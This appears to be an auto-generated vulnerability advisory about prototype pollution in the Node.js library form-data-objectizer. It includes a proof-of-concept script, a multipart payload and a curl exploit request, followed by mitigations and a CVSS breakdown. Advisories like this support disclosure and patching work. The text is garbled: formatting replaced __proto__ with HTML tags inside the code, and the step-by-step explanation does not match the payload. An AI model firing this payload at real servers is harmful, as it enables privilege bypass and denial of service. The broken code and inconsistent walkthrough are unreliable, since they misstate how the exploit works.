Nodejs, Prototype Pollution, CVE (pending) (High)

Listen to this Post

How the mentioned CVE works (around 20 lines):

The `form-data-objectizer` library recursively flattens bracket-notation form keys (e.g., name

</code>) into nested objects. The functions `treatInitial` and `treatSecond` inside `index.cjs` fail to filter dangerous keys like <code>__proto__</code>, <code>constructor</code>, or <code>prototype</code>.
When an HTTP form field is named `__proto__[bash]` with the value <code>yes</code>, the following happens:
1. `treatInitial` sees `inputName = "__proto__"` and <code>rest = "[bash]"</code>.
2. `"__proto__" in result` is `true` because `"__proto__"` is inherited from <code>Object.prototype</code>.

<h2 style="color: blue;">3. `newResult = result["__proto__"]` returns `Object.prototype`.</h2>

4. `treatSecond` recurses with <code>key = "polluted"</code>, <code>newRest = ""</code>, and assigns <code>Object.prototype.polluted = "yes"</code>.
Thus, `Object.prototype` is mutated, polluting every plain object in the Node.js process. A second payload, <code>constructor[bash][polluted]=yes</code>, walks `result.constructor` then `.prototype` to achieve the same effect.
The attack leaves no trace in parsed request logs because the malicious key is discarded, making it hard to detect.

<h2 style="color: blue;">dailycve form (3 words max per line):</h2>

Platform: Node.js
Version: <=1.0.0
Vulnerability : Prototype Pollution
Severity: High
date: 2025-05-18

<h2 style="color: blue;">Prediction: 2025-07-01</h2>

<h2 style="color: blue;">Analytics under heading What Undercode Say:</h2>

The vulnerability enables a single unauthenticated HTTP form submission to poison `Object.prototype` for the entire Node.js process. This affects all subsequent requests handled by the same process, potentially leading to security bypasses, configuration injection, and denial-of-service (DoS). The attack surface is wide because any application using `FormDataToObject.toObject()` on incoming form data is vulnerable. The lack of filtering for <code>__proto__</code>, <code>constructor</code>, and `prototype` makes the library unsafe for processing untrusted input. A proper fix must reject these keys or use an object with a `null` prototype to prevent prototype pollution.

<h2 style="color: blue;">bash commands and codes related to the blog</h2>

[bash]
Create a test directory
mkdir pp-fdo && cd pp-fdo
Initialize a Node.js project and install the vulnerable package
npm init -y
npm install [email protected]

Proof of concept (`poc.js`):

const FormDataToObject = require('form-data-objectizer');
const form = new FormData();
form.append('username', 'alice');
form.append('<strong>proto</strong>[bash]', 'yes');
FormDataToObject.toObject(form);
console.log(({}).polluted); // Outputs: 'yes'

Exploit:

An attacker can send a POST request with the following `multipart/form-data` payload:

Content-Disposition: form-data; name="<strong>proto</strong>[bash]"
yes

Or using `curl`:

curl -X POST http://target.com/endpoint \
-F "<strong>proto</strong>[bash]=yes" \
-F "username=alice"

After this request, any object created in the server process will inherit the `polluted` property with the value "yes". An attacker could use this primitive to alter application logic (e.g., override `isAdmin` checks, inject malicious configurations, or crash the worker by polluting properties used by dependencies).

Protection from this CVE:

  1. Upgrade – Wait for a patched version (>1.0.0) that rejects dangerous keys.
  2. Manual fix – Patch `index.cjs` locally by adding a rejection set:
    const REJECT = new Set(['<strong>proto</strong>', 'constructor', 'prototype']);
    if (REJECT.has(inputName) || REJECT.has(key)) return; // or throw
    
  3. Use a null‑prototype object – Replace the default result object with `Object.create(null)` to avoid inherited properties.
  4. Input validation – Reject any form field whose name contains __proto__, constructor, or `prototype` before parsing.
  5. Alternative library – Switch to a form‑parser that safely handles bracket notation (e.g., `qs` with allowPrototypes: false).

Impact:

  • Integrity (High) – Attacker can change property reads on all objects, allowing privilege escalation and business‑logic bypasses.
  • Availability (Low without a gadget) – Can crash the process by polluting properties used by other libraries (e.g., breaking `hasOwnProperty` checks).
  • Confidentiality (None) – Direct data leakage is unlikely, but polluted properties may be used in later steps to extract information.
  • Scope – Unchanged (the vulnerable library’s own behavior does not cross security boundaries).
  • CVSS Base Score: 8.2 (High) – CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top